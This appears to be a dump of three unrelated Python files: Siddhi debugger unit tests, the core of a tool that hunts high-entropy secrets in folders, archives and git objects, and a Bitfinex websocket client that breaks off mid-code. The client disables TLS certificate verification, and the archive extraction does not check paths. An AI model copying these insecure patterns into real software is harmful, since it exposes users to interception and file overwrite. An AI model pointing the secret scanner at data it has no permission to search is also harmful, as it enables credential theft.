siddhiManager.shutdown()
def test_debugger4(self):
logging.info("Siddi Debugger Test 4: Test next traversal in a query with time batch window where next call delays 1 sec")
siddhiManager = SiddhiManager()
cseEventStream = "define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream#window.timeBatch(1 sec) " + \
"select symbol, price, volume " + \
"insert into OutputStream;"
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
_self_shaddow.assertEquals(1, len(events),"Cannot emit all three in one time")
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count != 1 and queryTerminal.name == SiddhiDebugger.QueryTerminal.IN.name:
sleep(1.1)
#next call will not reach OUT since there is a window
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(1.5)
self.assertEquals(3, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger5(self):
logging.info("Siddi Debugger Test 5: Test play in a simple query")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, " + \
"volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream " + \
"select symbol, price, volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),"Incorrect debug event received at OUT")
debugger.play()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
sleep(0.1)
self.assertEquals(2, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(2, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger6(self):
logging.info("Siddi Debugger Test 6: Test play traversal in a query with length batch window")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, " + \
"volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream#window.lengthBatch(3) " + \
"select symbol, price, volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 3:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 60.0, 50], event.getOutputData(),
"Incorrect debug event received at IN")
debugger.play()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(0.1)
self.assertEquals(3, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger7(self):
logging.info("Siddi Debugger Test 7: Test play traversal in a query with time batch window")
siddhiManager = SiddhiManager()
cseEventStream = "define stream cseEventStream (symbol string, price float, volume int);";
query = "@info(name = 'query1')" + \
"from cseEventStream#window.timeBatch(3 sec) " + \
"select symbol, price, volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
current_milli_time = lambda: int(round(time.time() * 1000))
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + "\t" + str(current_milli_time()))
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 3:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 60.0, 50], event.getOutputData(),
"Incorrect debug event received at IN")
debugger.play()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(3.5)
self.assertEquals(3, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger8(self):
logging.info("Siddi Debugger Test 8: Test play traversal in a query with time batch window where play call delays" + \
" 1 sec")
siddhiManager = SiddhiManager()
cseEventStream = "define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream#window.timeBatch(1 sec) " + \
"select symbol, price, volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
_self_shaddow.assertEquals(1, _self_shaddow.getCount(event),"Only one event can be emitted from the window")
if count != 1 and "query1IN" == queryName :
sleep(1)
debugger.play()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(1.5)
self.assertEquals(3, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger9(self):
logging.info("Siddi Debugger Test 9: Test state traversal in a simple query")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, " + \
"volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream#window.length(3) " + \
"select symbol, price, sum(volume) as volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 2:
queryState = debugger.getQueryState(queryName)
logging.info(queryState)
streamEvent = None
# Order of the query state items is unpredictable
for (k,v) in queryState.items():
if k.startswith("AbstractStreamProcessor"):
streamEvent = v["ExpiredEventChunk"]
break
_self_shaddow.assertListEqual(streamEvent.getOutputData(),["WSO2", 50.0, None])
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
sleep(1)
self.assertEquals(2, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(4, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger10(self):
logging.info("Siddi Debugger Test 10: Test next traversal in a query with two consequent streams")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') " + \
"define stream cseEventStream (symbol string, price float, volume int); " + \
"define stream stockEventStream (symbol string, price float, volume int); "
query = "@info(name = 'query1')" + \
"from cseEventStream " + \
"select symbol, price, volume " + \
"insert into stockEventStream; " + \
"@info(name = 'query2')" + \
"from stockEventStream " + \
"select * " + \
"insert into OutputStream;"
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if 1 <= count <= 4:
# First four events
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),"Incorrect debug event received")
else:
#Next four events
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),"Incorrect debug event received")
if (count == 1 or count == 5) :
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
elif (count == 2 or count == 6):
_self_shaddow.assertEquals("query1OUT", queryName + queryTerminal.name,"Incorrect break point")
elif (count == 3 or count == 7):
_self_shaddow.assertEquals("query2IN", queryName + queryTerminal.name,"Incorrect break point")
else:
_self_shaddow.assertEquals("query2OUT", queryName + queryTerminal.name, "Incorrect break point")
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
sleep(0.1)
self.assertEquals(2, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(8, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger11(self):
logging.info("Siddi Debugger Test 11: Modify events during debug mode")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') " + \
"define stream cseEventStream (symbol string, price float, volume int); " + \
"define stream stockEventStream (symbol string, price float, volume int); "
query = "@info(name = 'query1')" + \
"from cseEventStream " + \
"select symbol, price, volume " + \
"insert into stockEventStream; " + \
"@info(name = 'query2')" + \
"from stockEventStream " + \
"select * " + \
"insert into OutputStream;"
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if (count == 1 or count == 2):
#WSO2 in stream 1
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),"Incorrect debug event received")
else:
# IBM in stream 2
_self_shaddow.assertListEqual(["IBM", 50.0, 60], event.getOutputData(),"Incorrect debug event received")
if count == 2:
#Modify the event at the end of the first stream
#TODO Improve the logic to use equal operator
event.setOutputData("IBM",0)
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
sleep(0.1)
self.assertEquals(1, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(4, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger12(self):
logging.info("Siddi Debugger Test 12: Test debugging two queries with concurrent input")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') " + \
"define stream cseEventStream (symbol string, price float, volume int); " + \
"define stream stockEventStream (symbol string, price float, volume int); "
query = "@info(name = 'query1')" + \
"from cseEventStream " + \
"select * " + \
"insert into OutputStream1; " + \
"@info(name = 'query2')" + \
"from stockEventStream " + \
"select * " + \
"insert into OutputStream2;"
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl1(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream1", OutputStreamCallbackImpl1())
class OutputStreamCallbackImpl2(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream2", OutputStreamCallbackImpl2())
cseEventStreamInputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
stockEventStreamInputHandler = siddhiAppRuntime.getInputHandler("stockEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
siddhiDebugger.acquireBreakPoint("query2", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def __init__(self):
SiddhiDebuggerCallback.__init__(self)
self.queryOneResumed = AtomicInt(0)
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
_self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if ("query1IN" == queryName):
sleep(1)
self.queryOneResumed.set(1)
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),"Incorrect debug event received")
elif "query2IN" == queryName:
#If query2IN is reached, query1IN must left that break point
_self_shaddow.assertTrue(self.queryOneResumed.get(),"Query 2 thread enterted the checkpoint before query 1 is debugged")
_self_shaddow.assertListEqual(["IBM", 45.0, 80], event.getOutputData(),"Incorrect debug event received")
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
def thread1_worker():
cseEventStreamInputHandler.send(["WSO2", 50.0, 60])
thread1 = threading.Thread(target=thread1_worker)
thread1.start()
def thread2_worker():
stockEventStreamInputHandler.send(["IBM", 45.0, 80])
thread2 = threading.Thread(target=thread2_worker)
thread2.start()
sleep(2)
self.assertEquals(2, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(4, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_set_debugger_callback(self):
logging.info("Siddi Debugger Wrapper Test 1: Set Debugger Callback")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query 1') from cseEventStream select symbol, price, volume insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class StreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", StreamCallbackImpl()) # Causes GC Error
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
#Callback1
class SiddhiDebuggerCallbackImpl1(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query 1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
else:
# No more events should be received
_self_shaddow.fail("The callback has not been released")
debugger.play()
#Callback2
class SiddhiDebuggerCallbackImpl2(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 2:
_self_shaddow.assertEquals("query 1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received at IN")
else:
# No more events should be received
_self_shaddow.fail("Invalid event count")
debugger.play()
siddhiDebugger.acquireBreakPoint("query 1", SiddhiDebugger.QueryTerminal.IN)
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl1())
inputHandler.send(["WSO2", 50.0, 60])
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl2())
inputHandler.send(["WSO2", 70.0, 40])
self.assertEquals(2, _self_shaddow.inEventCount.get(), "Invalid number of output events")
self.assertEquals(2, _self_shaddow.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_acquire_release_breakpoint(self):
logging.info("Siddi Debugger Wrapper Test 2: Acquire and Release Break Point")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query 1') from cseEventStream select symbol, price, volume insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class StreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", StreamCallbackImpl()) #Causes GC Error
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName,queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query 1IN", queryName + queryTerminal.name,"Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60],event.getOutputData(),"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query 1OUT", queryName + queryTerminal.name,"Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60],event.getOutputData(),"Incorrect debug event received at IN")
else:
#No more events should be received
_self_shaddow.fail("The breakpoint has not been released")
debugger.play()
siddhiDebugger.acquireBreakPoint("query 1", SiddhiDebugger.QueryTerminal.IN)
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
siddhiDebugger.releaseBreakPoint("query 1", SiddhiDebugger.QueryTerminal.IN)
inputHandler.send(["WSO2", 70.0, 40])
sleep(0.1)
self.assertEquals(2, _self_shaddow.inEventCount.get(), "Invalid number of output events")
self.assertEquals(1, _self_shaddow.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
if __name__ == '__main__':
unittest.main()
#TODO: Test 11: Improve write-backs
#TODO: Add a test on ComplexEvent
|
core.py
|
#!/bin/env python
import yaml
import multiprocessing
import math
import os
import tarfile
import zipfile
import time
import fnmatch
import zlib
import logging
import advancedSearch
from termcolor import colored
CONFIG = yaml.safe_load(open('config.yaml'))
BASE64_CHARS = CONFIG['base64_chars']
PATH = './'
ARCHIVE_TYPES = CONFIG['archive_types']
EXCLUDED = CONFIG['excluded']
REMOVE_FLAG = False
ADVANCED_SEARCH = False
LOGFILE = CONFIG['logfile']
MIN_KEY_LENGTH = CONFIG['min_key_length']
MAX_KEY_LENGTH = CONFIG['max_key_length']
HIGH_ENTROPY_EDGE = CONFIG['high_entropy_edge']
logging.basicConfig(filename=LOGFILE, level=logging.DEBUG,
format='%(asctime)s %(levelname)s %(name)s %(message)s')
logger=logging.getLogger(__name__)
queue = multiprocessing.Manager().Queue()
def log(msg, log_type='error'):
if log_type == 'error':
logger.error(msg)
elif log_type == 'info':
logger.info(msg)
def mp_handler():
jobs = []
#depending on your hardware the DumpsterDiver will use all available cores
for i in range(multiprocessing.cpu_count()):
pro = [multiprocessing.Process(target=worker) for i in range(queue.qsize())]
for p in pro:
p.daemon = True
p.start()
jobs.append(p)
for job in jobs:
job.join()
job.terminate()
def worker():
_file = queue.get()
analyzer(_file)
queue.task_done()
def analyzer(_file):
try:
entropy_found = False
rule_triggerred = False
if ADVANCED_SEARCH:
additional_checks = advancedSearch.AdvancedSearch()
additional_checks.filetype_check(_file)
for word in file_reader(_file):
base64_strings = get_strings(word)
for string in base64_strings:
b64Entropy = shannon_entropy(string)
if b64Entropy > HIGH_ENTROPY_EDGE:
#print(string + 'has entropy ' + str(b64Entropy))
print(colored('FOUND HIGH ENTROPY!!!', 'green'))
print(colored('The following string: ', 'green') + colored(string, 'magenta') + colored(' has been found in ' + _file, 'green'))
logger.info('high entropy has been found in a file ' + _file)
entropy_found = True
if ADVANCED_SEARCH:
additional_checks.grepper(word)
if ADVANCED_SEARCH:
rule_triggerred = additional_checks.final(_file)
if REMOVE_FLAG and not (entropy_found or rule_triggerred): remove_file(_file)
except Exception as e:
logger.error('while trying to analyze ' + str(_file) + '. Details:\n' + str(e))
def file_reader(_file):
try:
with open(_file, 'r') as f:
while True:
buf = f.read(1024)
if not buf:
break
while not str.isspace(buf[-1]):
ch = f.read(1)
if not ch:
break
buf += ch
words = buf.split()
for word in words:
yield word
f.close()
except Exception as e:
print(colored('Cannot read ' + _file,'red'))
log('while trying to read ' + str(_file) + '. Details:\n' + str(e))
def folder_reader(path):
try:
for root, subfolder, files in os.walk(path):
for filename in files:
extension = os.path.splitext(filename)[1]
_file = root + '/' + filename
#check if it is archive
if extension in EXCLUDED:
# remove unnecesarry files
if REMOVE_FLAG:
_file = root + '/' + filename
remove_file(_file)
elif extension in ARCHIVE_TYPES:
archive = root + '/' + filename
folder_reader(extract_archive(archive))
elif extension == '' and ('.git/objects/' in _file):
try:
with open(_file, 'rb') as f:
# reading 16 magic bits to recognize VAX COFF
if f.read(2) == b'x\x01':
decompressed = git_object_reader(_file)
if decompressed:
queue.put(decompressed)
f.close()
except Exception as e:
logger.error(e)
else:
queue.put(_file)
except Exception as e:
logger.error(e)
def remove_file(_file):
try:
os.remove(_file)
except Exception as e:
logger.error(e)
def extract_archive(archive):
try:
if archive.endswith('.zip'):
opener, mode = zipfile.ZipFile, 'r'
elif archive.endswith('.tar.gz') or archive.endswith('.tgz'):
opener, mode = tarfile.open, 'r:gz'
elif archive.endswith('.tar.bz2') or archive.endswith('.tbz'):
opener, mode = tarfile.open, 'r:bz2'
else:
logger.info('Cannot open archive ' + archive)
cwd = os.getcwd()
#in case one archive contains another archive with the same name I used epoch time as the name for each extracted archive
extracted_folder = cwd + '/Extracted_files/' + str(time.time())
os.makedirs(extracted_folder)
os.chdir(extracted_folder)
_file = opener(archive, mode)
try: _file.extractall()
except Exception as e:
print(colored('Cannot unpack ' + archive + ' archive', 'red'))
logger.error(e)
finally: _file.close()
except Exception as e:
logger.error(e)
finally:
os.chdir(cwd)
return extracted_folder
def start_the_hunt():
folder_reader(PATH)
mp_handler()
def shannon_entropy(data):
'''
Borrowed from http://blog.dkbza.org/2007/05/scanning-data-for-entropy-anomalies.html
'''
try:
if not data:
return 0
entropy = 0
for x in BASE64_CHARS:
p_x = float(data.count(x))/len(data)
if p_x > 0:
entropy += - p_x*math.log(p_x, 2)
return entropy
except Exception as e:
logger.error(e)
def get_strings(word):
try:
count = 0
letters = ''
strings = []
for char in word:
if char in BASE64_CHARS:
letters += char
count += 1
else:
if MAX_KEY_LENGTH >= count >= MIN_KEY_LENGTH-1:
strings.append(letters)
letters = ''
count = 0
if MAX_KEY_LENGTH >= count >= MIN_KEY_LENGTH-1:
strings.append(letters)
return strings
except Exception as e:
logger.error(e)
def git_object_reader(_file):
try:
git_object = open(_file, 'rb').read()
decompressed = zlib.decompress(git_object)
new_file = _file + '_decompressed'
with open(new_file, 'w') as decompressed_file:
decompressed_file.write(str(decompressed))
decompressed_file.close()
return new_file
except Exception as e:
logger.error(e)
|
vnbitfinex.py
|
# encoding: UTF-8
import json
import requests
import traceback
import ssl
from threading import Thread
from queue import Queue, Empty
import websocket
WEBSOCKET_V2_URL = 'wss://api.bitfinex.com/ws/2'
RESTFUL_V1_URL = 'https://api.bitfinex.com/v1'
########################################################################
class BitfinexApi(object):
""""""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.ws = None
self.thread = None
self.active = False
self.restQueue = Queue()
self.restThread = None
#----------------------------------------------------------------------
def start(self):
""""""
self.ws = websocket.create_connection(WEBSOCKET_V2_URL,
sslopt={'cert_reqs': ssl.CERT_NONE})
self.active = True
self.thread = Thread(target=self.run)
self.thread.start()
self.restThread = Thread(target=self.runRest)
self.restThread.start()
self.onConnect()
#----------------------------------------------------------------------
def reconnect(self):
""""""
self.ws = websocket.create_connection(WEBSOCKET_V2_URL,
sslopt={'cert_reqs': ssl.CERT_NONE})
self.onConnect()
#----------------------------------------------------------------------
def run(self):
""""""
while self.active:
try:
stream = self.ws.recv()
data = json.loads(stream)
self.onData(data)
except:
msg = traceback.format_exc()
self.onError(msg)
self.reconnect()
#----------------------------------------------------------------------
def close(self):
""""""
self.active = False
if self.thread:
self.thread.join()
if self.restThread:
self.thread.join()
#----------------------------------------------------------------------
def onConnect(self):
""""""
print 'connected'
#----------------------------------------------------------------------
def onData(self, data):
""""""
print data
#----------------------------------------------------------------------
def onError(self, msg):
""""""
print msg
#----------------------------------------------------------------------
def sendReq(self, req):
""""""
self.ws.send(json.dumps(req))
#----------------------------------------------------------------------
def sendRestReq(self, path, callback):
""""""
self.restQueue.put((path, callback))
#----------------------------------------------------------------------
def runRest(self):
""""""
while self.active:
try:
path, callback = self.restQueue.get(timeout=1)
self.httpGet(path, callback)
except Empty:
pass
#----------------------------------------------------------------------
def httpGet(self, path, callback):
""""""
url = RESTFUL_V1_URL + path
resp = requests.get(url)
callback(resp.json())
if __name__ == '__main__':
api = BitfinexApi()
api.start()
d = {
'event': 'subscribe',
